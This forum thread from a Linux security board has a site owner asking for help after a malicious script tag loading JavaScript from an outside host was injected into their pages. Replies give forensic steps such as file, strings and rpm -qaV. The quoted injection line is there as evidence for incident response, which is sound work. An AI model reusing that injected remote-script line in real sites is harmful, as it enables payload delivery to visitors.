Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
This time I want to ask you a special support; since yesterday I have had problems with the content of our system.
Investigating the situation we've found that someone have included in our maliciosus code contained this script <script src="http://csjq.hol.es/xs.js"/script> this one was Built with a tool called makeself.
Reading about this tool we found that makeself is a small shell script that generates a self-extractable compressed TAR archive from a directory. The resulting file appears as a shell script, and can be launched as is. The archive will then uncompress itself to a temporary directory and an arbitrary command will be executed (for example, an installation script).
So, can any body help me to identify what are the scripts or file that this tools generated?
You could look for files with a ctime later than about the time of the hostile activity.
You could extract a tarfile once you have found it.
On a disposable system a trick for capturing self-extracting content is to have an append-only filesystem that you extract on and the code will fail to delete its traces. You could rig this using NFS or a kernel with unlink() not implemented. Directory attributes also work provided the extraction uses the directory in question.
Use "file" to find out what kind of file it is. If ascii text or script you should be able to view it.
You can use "strings" to view any type of characters it can find, even in a binary.
Also, you can find out if any system files have been compromised (usually /bin or /usr/bin) by running rpm -qV. V = verify. It will tell you what files have been changed since original package installation. To view everything
rpm -qaV
This will take awhile
And of course you'll need someone linux-proficient to go through the output and know which files are supposed to have been changed since installation (e.g. /etc/passwd).
And you'll have to also then look in those files and see if changes are expected or not (who knows the proper users in /etc/passwd? )
But if it shows you for example that /bin/ls has changed since install, that is fishy
If someone was capable of modifying your delivered web-page at all, then some part of your system has been compromised. (Or else you have a rogue employee ...)
So much time wasted on what's it is or what's in it...who cares? All I'd need to know is I, or my system did not put it there and that makes it immediately suspect.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.